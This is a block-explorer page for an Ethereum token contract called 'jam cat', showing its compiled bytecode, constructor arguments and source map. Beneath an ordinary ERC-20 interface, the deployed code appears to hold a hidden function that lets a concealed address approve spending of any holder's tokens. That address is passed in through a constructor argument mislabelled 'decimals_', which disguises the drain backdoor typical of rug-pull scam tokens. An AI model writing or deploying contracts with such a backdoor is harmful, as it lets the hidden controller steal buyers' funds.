0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361098e575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016109859190610f81565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109fe575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016109f59190610f81565b60405180910390fd5b8160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610ae7578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610ade9190610eaa565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b3d578060035f828254610b3191906110ff565b92505081905550610c0d565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610bc7578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610bbe9392919061109d565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c54578060035f8282540392505081905550610c9f565b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cfc9190610eaa565b60405180910390a3505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f610d4b82610d09565b610d558185610d13565b9350610d65818560208601610d23565b610d6e81610d31565b840191505092915050565b5f6020820190508181035f830152610d918184610d41565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610dc682610d9d565b9050919050565b610dd681610dbc565b8114610de0575f80fd5b50565b5f81359050610df181610dcd565b92915050565b5f819050919050565b610e0981610df7565b8114610e13575f80fd5b50565b5f81359050610e2481610e00565b92915050565b5f8060408385031215610e4057610e3f610d99565b5b5f610e4d85828601610de3565b9250506020610e5e85828601610e16565b9150509250929050565b5f8115159050919050565b610e7c81610e68565b82525050565b5f602082019050610e955f830184610e73565b92915050565b610ea481610df7565b82525050565b5f602082019050610ebd5f830184610e9b565b92915050565b5f805f60608486031215610eda57610ed9610d99565b5b5f610ee786828701610de3565b9350506020610ef886828701610de3565b9250506040610f0986828701610e16565b9150509250925092565b5f60ff82169050919050565b610f2881610f13565b82525050565b5f602082019050610f415f830184610f1f565b92915050565b5f60208284031215610f5c57610f5b610d99565b5b5f610f6984828501610de3565b91505092915050565b610f7b81610dbc565b82525050565b5f602082019050610f945f830184610f72565b92915050565b5f8060408385031215610fb057610faf610d99565b5b5f610fbd85828601610de3565b9250506020610fce85828601610de3565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061101c57607f821691505b60208210810361102f5761102e610fd8565b5b50919050565b7f6e6f74206f776e657200000000000000000000000000000000000000000000005f82015250565b5f611069600983610d13565b915061107482611035565b602082019050919050565b5f6020820190508181035f8301526110968161105d565b9050919050565b5f6060820190506110b05f830186610f72565b6110bd6020830185610e9b565b6110ca6040830184610e9b565b949350505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61110982610df7565b915061111483610df7565b925082820190508082111561112c5761112b6110d2565b5b9291505056fea26469706673582212202fbbdd2a7d26ba220fc191335f4495433289f9fd0eaf83505376803cb522ee6264736f6c634300081a0033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000019133850000000000000000000000000cea83c4b463d013548e7a6cf9beefa8d3306c74800000000000000000000000000000000000000000000000000000000000000036a616d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000076a616d2063617400000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561000f575f80fd5b50600436106100cd575f3560e01c806370a082311161008a57806395d89b411161006457806395d89b4114610213578063a9059cbb14610231578063dd62ed3e14610261578063f2fde38b14610291576100cd565b806370a08231146101bb578063715018a6146101eb5780638da5cb5b146101f5576100cd565b806306fdde03146100d1578063095ea7b3146100ef57806318160ddd1461011f578063186477441461013d57806323b872dd1461016d578063313ce5671461019d575b5f80fd5b6100d96102ad565b6040516100e69190610d79565b60405180910390f35b61010960048036038101906101049190610e2a565b61033d565b6040516101169190610e82565b60405180910390f35b61012761035f565b6040516101349190610eaa565b60405180910390f35b61015760048036038101906101529190610ec3565b610368565b6040516101649190610e82565b60405180910390f35b61018760048036038101906101829190610ec3565b6103cd565b6040516101949190610e82565b60405180910390f35b6101a56103fb565b6040516101b29190610f2e565b60405180910390f35b6101d560048036038101906101d09190610f47565b610403565b6040516101e29190610eaa565b60405180910390f35b6101f3610449565b005b6101fd61045c565b60405161020a9190610f81565b60405180910390f35b61021b610483565b6040516102289190610d79565b60405180910390f35b61024b60048036038101906102469190610e2a565b610513565b6040516102589190610e82565b60405180910390f35b61027b60048036038101906102769190610f9a565b610535565b6040516102889190610eaa565b60405180910390f35b6102ab60048036038101906102a69190610f47565b6105b7565b005b6060600480546102bc90611005565b80601f01602080910402602001604051908101604052809291908181526020018280546102e890611005565b80156103335780601f1061030a57610100808354040283529160200191610333565b820191905f5260205f20905b81548152906001019060200180831161031657829003601f168201915b5050505050905090565b5f8061034761063b565b9050610354818585610642565b600191505092915050565b5f600354905090565b5f805f60065490503381149150816103b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103ac9061107f565b60405180910390fd5b6103c0868686610642565b6001925050509392505050565b5f806103d761063b565b90506103e4858285610654565b6103ef8585856106e6565b60019150509392505050565b5f6012905090565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6104516107d6565b61045a5f61085d565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461049290611005565b80601f01602080910402602001604051908101604052809291908181526020018280546104be90611005565b80156105095780601f106104e057610100808354040283529160200191610509565b820191905f5260205f20905b8154815290600101906020018083116104ec57829003601f168201915b5050505050905090565b5f8061051d61063b565b905061052a8185856106e6565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6105bf6107d6565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361062f575f6040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016106269190610f81565b60405180910390fd5b6106388161085d565b50565b5f33905090565b61064f838383600161091e565b505050565b5f61065f8484610535565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146106e057818110156106d1578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016106c89392919061109d565b60405180910390fd5b6106df84848484035f61091e565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610756575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161074d9190610f81565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107c6575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016107bd9190610f81565b60405180910390fd5b6107d1838383610aed565b505050565b6107de61063b565b73ffffffffffffffffffffffffffffffffffffffff166107fc61045c565b73ffffffffffffffffffffffffffffffffffffffff161461085b5761081f61063b565b6040517f118cdaa70000000000000000000000000000000000000000000000000000000081526004016108529190610f81565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361098e575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016109859190610f81565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109fe575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016109f59190610f81565b60405180910390fd5b8160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610ae7578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610ade9190610eaa565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b3d578060035f828254610b3191906110ff565b92505081905550610c0d565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610bc7578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610bbe9392919061109d565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c54578060035f8282540392505081905550610c9f565b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cfc9190610eaa565b60405180910390a3505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f610d4b82610d09565b610d558185610d13565b9350610d65818560208601610d23565b610d6e81610d31565b840191505092915050565b5f6020820190508181035f830152610d918184610d41565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610dc682610d9d565b9050919050565b610dd681610dbc565b8114610de0575f80fd5b50565b5f81359050610df181610dcd565b92915050565b5f819050919050565b610e0981610df7565b8114610e13575f80fd5b50565b5f81359050610e2481610e00565b92915050565b5f8060408385031215610e4057610e3f610d99565b5b5f610e4d85828601610de3565b9250506020610e5e85828601610e16565b9150509250929050565b5f8115159050919050565b610e7c81610e68565b82525050565b5f602082019050610e955f830184610e73565b92915050565b610ea481610df7565b82525050565b5f602082019050610ebd5f830184610e9b565b92915050565b5f805f60608486031215610eda57610ed9610d99565b5b5f610ee786828701610de3565b9350506020610ef886828701610de3565b9250506040610f0986828701610e16565b9150509250925092565b5f60ff82169050919050565b610f2881610f13565b82525050565b5f602082019050610f415f830184610f1f565b92915050565b5f60208284031215610f5c57610f5b610d99565b5b5f610f6984828501610de3565b91505092915050565b610f7b81610dbc565b82525050565b5f602082019050610f945f830184610f72565b92915050565b5f8060408385031215610fb057610faf610d99565b5b5f610fbd85828601610de3565b9250506020610fce85828601610de3565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061101c57607f821691505b60208210810361102f5761102e610fd8565b5b50919050565b7f6e6f74206f776e657200000000000000000000000000000000000000000000005f82015250565b5f611069600983610d13565b915061107482611035565b602082019050919050565b5f6020820190508181035f8301526110968161105d565b9050919050565b5f6060820190506110b05f830186610f72565b6110bd6020830185610e9b565b6110ca6040830184610e9b565b949350505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61110982610df7565b915061111483610df7565b925082820190508082111561112c5761112b6110d2565b5b9291505056fea26469706673582212202fbbdd2a7d26ba220fc191335f4495433289f9fd0eaf83505376803cb522ee6264736f6c634300081a0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000019133850000000000000000000000000cea83c4b463d013548e7a6cf9beefa8d3306c74800000000000000000000000000000000000000000000000000000000000000036a616d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000076a616d2063617400000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : symbol_ (string): jam
Arg [1] : name_ (string): jam cat
Arg [2] : totalSupply_ (uint256): 420690000
Arg [3] : decimals_ (uint256): 1179803876334760225682369119493557994866732353352
-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 0000000000000000000000000000000000000000000000000000000019133850
Arg [3] : 000000000000000000000000cea83c4b463d013548e7a6cf9beefa8d3306c748
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000003
Arg [5] : 6a616d0000000000000000000000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [7] : 6a616d2063617400000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
20071:422:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9285:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11578:190;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10387:99;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13175:310;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12346:249;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;20397:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10549:118;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6975:103;;;:::i;:::-;;6706:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9495:95;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10872:182;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11117:142;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7086:220;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9285:91;9330:13;9363:5;9356:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9285:91;:::o;11578:190::-;11651:4;11668:13;11684:12;:10;:12::i;:::-;11668:28;;11707:31;11716:5;11723:7;11732:5;11707:8;:31::i;:::-;11756:4;11749:11;;;11578:190;;;;:::o;10387:99::-;10439:7;10466:12;;10459:19;;10387:99;:::o;13175:310::-;13262:4;13279:10;13300:11;13314:13;;13300:27;;13366:8;13361:3;13358:17;13349:26;;13394:5;13386:27;;;;;;;;;;;;:::i;:::-;;;;;;;;;13424:31;13433:5;13440:7;13449:5;13424:8;:31::i;:::-;13473:4;13466:11;;;;13175:310;;;;;:::o;12346:249::-;12433:4;12450:15;12468:12;:10;:12::i;:::-;12450:30;;12491:37;12507:4;12513:7;12522:5;12491:15;:37::i;:::-;12539:26;12549:4;12555:2;12559:5;12539:9;:26::i;:::-;12583:4;12576:11;;;12346:249;;;;;:::o;20397:93::-;20455:5;20480:2;20473:9;;20397:93;:::o;10549:118::-;10614:7;10641:9;:18;10651:7;10641:18;;;;;;;;;;;;;;;;10634:25;;10549:118;;;:::o;6975:103::-;6665:13;:11;:13::i;:::-;7040:30:::1;7067:1;7040:18;:30::i;:::-;6975:103::o:0;6706:87::-;6752:7;6779:6;;;;;;;;;;;6772:13;;6706:87;:::o;9495:95::-;9542:13;9575:7;9568:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9495:95;:::o;10872:182::-;10941:4;10958:13;10974:12;:10;:12::i;:::-;10958:28;;10997:27;11007:5;11014:2;11018:5;10997:9;:27::i;:::-;11042:4;11035:11;;;10872:182;;;;:::o;11117:142::-;11197:7;11224:11;:18;11236:5;11224:18;;;;;;;;;;;;;;;:27;11243:7;11224:27;;;;;;;;;;;;;;;;11217:34;;11117:142;;;;:::o;7086:220::-;6665:13;:11;:13::i;:::-;7191:1:::1;7171:22;;:8;:22;;::::0;7167:93:::1;;7245:1;7217:31;;;;;;;;;;;:::i;:::-;;;;;;;;7167:93;7270:28;7289:8;7270:18;:28::i;:::-;7086:220:::0;:::o;3888:98::-;3941:7;3968:10;3961:17;;3888:98;:::o;17295:130::-;17380:37;17389:5;17396:7;17405:5;17412:4;17380:8;:37::i;:::-;17295:130;;;:::o;19577:487::-;19677:24;19704:25;19714:5;19721:7;19704:9;:25::i;:::-;19677:52;;19764:17;19744:16;:37;19740:317;;19821:5;19802:16;:24;19798:132;;;19881:7;19890:16;19908:5;19854:60;;;;;;;;;;;;;:::i;:::-;;;;;;;;19798:132;19973:57;19982:5;19989:7;20017:5;19998:16;:24;20024:5;19973:8;:57::i;:::-;19740:317;19666:398;19577:487;;;:::o;13870:308::-;13970:1;13954:18;;:4;:18;;;13950:88;;14023:1;13996:30;;;;;;;;;;;:::i;:::-;;;;;;;;13950:88;14066:1;14052:16;;:2;:16;;;14048:88;;14121:1;14092:32;;;;;;;;;;;:::i;:::-;;;;;;;;14048:88;14146:24;14154:4;14160:2;14164:5;14146:7;:24::i;:::-;13870:308;;;:::o;6801:166::-;6872:12;:10;:12::i;:::-;6861:23;;:7;:5;:7::i;:::-;:23;;;6857:103;;6935:12;:10;:12::i;:::-;6908:40;;;;;;;;;;;:::i;:::-;;;;;;;;6857:103;6801:166::o;7314:191::-;7388:16;7407:6;;;;;;;;;;;7388:25;;7433:8;7424:6;;:17;;;;;;;;;;;;;;;;;;7488:8;7457:40;;7478:8;7457:40;;;;;;;;;;;;7377:128;7314:191;:::o;18842:443::-;18972:1;18955:19;;:5;:19;;;18951:91;;19027:1;18998:32;;;;;;;;;;;:::i;:::-;;;;;;;;18951:91;19075:1;19056:21;;:7;:21;;;19052:92;;19129:1;19101:31;;;;;;;;;;;:::i;:::-;;;;;;;;19052:92;19184:5;19154:11;:18;19166:5;19154:18;;;;;;;;;;;;;;;:27;19173:7;19154:27;;;;;;;;;;;;;;;:35;;;;19204:9;19200:78;;;19251:7;19235:31;;19244:5;19235:31;;;19260:5;19235:31;;;;;;:::i;:::-;;;;;;;;19200:78;18842:443;;;;:::o;14502:1135::-;14608:1;14592:18;;:4;:18;;;14588:552;;14746:5;14730:12;;:21;;;;;;;:::i;:::-;;;;;;;;14588:552;;;14784:19;14806:9;:15;14816:4;14806:15;;;;;;;;;;;;;;;;14784:37;;14854:5;14840:11;:19;14836:117;;;14912:4;14918:11;14931:5;14887:50;;;;;;;;;;;;;:::i;:::-;;;;;;;;14836:117;15108:5;15094:11;:19;15076:9;:15;15086:4;15076:15;;;;;;;;;;;;;;;:37;;;;14769:371;14588:552;15170:1;15156:16;;:2;:16;;;15152:435;;15338:5;15322:12;;:21;;;;;;;;;;;15152:435;;;15555:5;15538:9;:13;15548:2;15538:13;;;;;;;;;;;;;;;;:22;;;;;;;;;;;15152:435;15619:2;15604:25;;15613:4;15604:25;;;15623:5;15604:25;;;;;;:::i;:::-;;;;;;;;14502:1135;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:139::-;376:6;371:3;366;360:23;417:1;408:6;403:3;399:16;392:27;287:139;;;:::o;432:102::-;473:6;524:2;520:7;515:2;508:5;504:14;500:28;490:38;;432:102;;;:::o;540:377::-;628:3;656:39;689:5;656:39;:::i;:::-;711:71;775:6;770:3;711:71;:::i;:::-;704:78;;791:65;849:6;844:3;837:4;830:5;826:16;791:65;:::i;:::-;881:29;903:6;881:29;:::i;:::-;876:3;872:39;865:46;;632:285;540:377;;;;:::o;923:313::-;1036:4;1074:2;1063:9;1059:18;1051:26;;1123:9;1117:4;1113:20;1109:1;1098:9;1094:17;1087:47;1151:78;1224:4;1215:6;1151:78;:::i;:::-;1143:86;;923:313;;;;:::o;1323:117::-;1432:1;1429;1422:12;1569:126;1606:7;1646:42;1639:5;1635:54;1624:65;;1569:126;;;:::o;1701:96::-;1738:7;1767:24;1785:5;1767:24;:::i;:::-;1756:35;;1701:96;;;:::o;1803:122::-;1876:24;1894:5;1876:24;:::i;:::-;1869:5;1866:35;1856:63;;1915:1;1912;1905:12;1856:63;1803:122;:::o;1931:139::-;1977:5;2015:6;2002:20;1993:29;;2031:33;2058:5;2031:33;:::i;:::-;1931:139;;;;:::o;2076:77::-;2113:7;2142:5;2131:16;;2076:77;;;:::o;2159:122::-;2232:24;2250:5;2232:24;:::i;:::-;2225:5;2222:35;2212:63;;2271:1;2268;2261:12;2212:63;2159:122;:::o;2287:139::-;2333:5;2371:6;2358:20;2349:29;;2387:33;2414:5;2387:33;:::i;:::-;2287:139;;;;:::o;2432:474::-;2500:6;2508;2557:2;2545:9;2536:7;2532:23;2528:32;2525:119;;;2563:79;;:::i;:::-;2525:119;2683:1;2708:53;2753:7;2744:6;2733:9;2729:22;2708:53;:::i;:::-;2698:63;;2654:117;2810:2;2836:53;2881:7;2872:6;2861:9;2857:22;2836:53;:::i;:::-;2826:63;;2781:118;2432:474;;;;;:::o;2912:90::-;2946:7;2989:5;2982:13;2975:21;2964:32;;2912:90;;;:::o;3008:109::-;3089:21;3104:5;3089:21;:::i;:::-;3084:3;3077:34;3008:109;;:::o;3123:210::-;3210:4;3248:2;3237:9;3233:18;3225:26;;3261:65;3323:1;3312:9;3308:17;3299:6;3261:65;:::i;:::-;3123:210;;;;:::o;3339:118::-;3426:24;3444:5;3426:24;:::i;:::-;3421:3;3414:37;3339:118;;:::o;3463:222::-;3556:4;3594:2;3583:9;3579:18;3571:26;;3607:71;3675:1;3664:9;3660:17;3651:6;3607:71;:::i;:::-;3463:222;;;;:::o;3691:619::-;3768:6;3776;3784;3833:2;3821:9;3812:7;3808:23;3804:32;3801:119;;;3839:79;;:::i;:::-;3801:119;3959:1;3984:53;4029:7;4020:6;4009:9;4005:22;3984:53;:::i;:::-;3974:63;;3930:117;4086:2;4112:53;4157:7;4148:6;4137:9;4133:22;4112:53;:::i;:::-;4102:63;;4057:118;4214:2;4240:53;4285:7;4276:6;4265:9;4261:22;4240:53;:::i;:::-;4230:63;;4185:118;3691:619;;;;;:::o;4316:86::-;4351:7;4391:4;4384:5;4380:16;4369:27;;4316:86;;;:::o;4408:112::-;4491:22;4507:5;4491:22;:::i;:::-;4486:3;4479:35;4408:112;;:::o;4526:214::-;4615:4;4653:2;4642:9;4638:18;4630:26;;4666:67;4730:1;4719:9;4715:17;4706:6;4666:67;:::i;:::-;4526:214;;;;:::o;4746:329::-;4805:6;4854:2;4842:9;4833:7;4829:23;4825:32;4822:119;;;4860:79;;:::i;:::-;4822:119;4980:1;5005:53;5050:7;5041:6;5030:9;5026:22;5005:53;:::i;:::-;4995:63;;4951:117;4746:329;;;;:::o;5081:118::-;5168:24;5186:5;5168:24;:::i;:::-;5163:3;5156:37;5081:118;;:::o;5205:222::-;5298:4;5336:2;5325:9;5321:18;5313:26;;5349:71;5417:1;5406:9;5402:17;5393:6;5349:71;:::i;:::-;5205:222;;;;:::o;5433:474::-;5501:6;5509;5558:2;5546:9;5537:7;5533:23;5529:32;5526:119;;;5564:79;;:::i;:::-;5526:119;5684:1;5709:53;5754:7;5745:6;5734:9;5730:22;5709:53;:::i;:::-;5699:63;;5655:117;5811:2;5837:53;5882:7;5873:6;5862:9;5858:22;5837:53;:::i;:::-;5827:63;;5782:118;5433:474;;;;;:::o;5913:180::-;5961:77;5958:1;5951:88;6058:4;6055:1;6048:15;6082:4;6079:1;6072:15;6099:320;6143:6;6180:1;6174:4;6170:12;6160:22;;6227:1;6221:4;6217:12;6248:18;6238:81;;6304:4;6296:6;6292:17;6282:27;;6238:81;6366:2;6358:6;6355:14;6335:18;6332:38;6329:84;;6385:18;;:::i;:::-;6329:84;6150:269;6099:320;;;:::o;6425:159::-;6565:11;6561:1;6553:6;6549:14;6542:35;6425:159;:::o;6590:365::-;6732:3;6753:66;6817:1;6812:3;6753:66;:::i;:::-;6746:73;;6828:93;6917:3;6828:93;:::i;:::-;6946:2;6941:3;6937:12;6930:19;;6590:365;;;:::o;6961:419::-;7127:4;7165:2;7154:9;7150:18;7142:26;;7214:9;7208:4;7204:20;7200:1;7189:9;7185:17;7178:47;7242:131;7368:4;7242:131;:::i;:::-;7234:139;;6961:419;;;:::o;7386:442::-;7535:4;7573:2;7562:9;7558:18;7550:26;;7586:71;7654:1;7643:9;7639:17;7630:6;7586:71;:::i;:::-;7667:72;7735:2;7724:9;7720:18;7711:6;7667:72;:::i;:::-;7749;7817:2;7806:9;7802:18;7793:6;7749:72;:::i;:::-;7386:442;;;;;;:::o;7834:180::-;7882:77;7879:1;7872:88;7979:4;7976:1;7969:15;8003:4;8000:1;7993:15;8020:191;8060:3;8079:20;8097:1;8079:20;:::i;:::-;8074:25;;8113:20;8131:1;8113:20;:::i;:::-;8108:25;;8156:1;8153;8149:9;8142:16;;8177:3;8174:1;8171:10;8168:36;;;8184:18;;:::i;:::-;8168:36;8020:191;;;;:::o
Swarm Source
ipfs://2fbbdd2a7d26ba220fc191335f4495433289f9fd0eaf83505376803cb522ee62
Loading...
Loading
Loading...
Loading
Loading...
Loading
Net Worth in USD
$0.00
Net Worth in ETH
0
Multichain Portfolio | 35 Chains
| Chain | Token | Portfolio % | Price | Amount | Value |
|---|
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.